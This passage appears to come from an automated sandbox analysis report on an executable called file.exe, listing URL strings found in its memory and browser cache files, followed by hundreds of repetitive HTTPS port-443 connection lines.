              Source: file.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_204.14.drString found in binary or memory: https://github.com/Thraka
              Source: chromecache_204.14.drString found in binary or memory: https://github.com/Youssef1313
              Source: chromecache_204.14.drString found in binary or memory: https://github.com/adegeo
              Source: chromecache_204.14.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
              Source: chromecache_204.14.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
              Source: chromecache_204.14.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
              Source: chromecache_204.14.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://github.com/dotnet/try
              Source: chromecache_204.14.drString found in binary or memory: https://github.com/gewarren
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://github.com/js-cookie/js-cookie
              Source: chromecache_204.14.drString found in binary or memory: https://github.com/mairaw
              Source: chromecache_204.14.drString found in binary or memory: https://github.com/nschonni
              Source: file.exe, 00000000.00000003.2265562675.0000000005971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: chromecache_204.14.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
              Source: chromecache_186.14.drString found in binary or memory: https://schema.org
              Source: file.exe, 00000000.00000003.2264718193.0000000005A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2264718193.0000000005A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
              Source: chromecache_186.14.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
              Source: file.exe, 00000000.00000003.2265449881.000000000596E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265562675.0000000005971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: file.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_196.14.dr, chromecache_186.14.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
              Source: file.exe, 00000000.00000003.2265216591.00000000059AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: file.exe, 00000000.00000003.2265216591.00000000059AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: file.exe, 00000000.00000003.2264718193.0000000005A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: file.exe, 00000000.00000003.2264718193.0000000005A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: file.exe, 00000000.00000003.2264718193.0000000005A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2265449881.000000000596E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265562675.0000000005971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
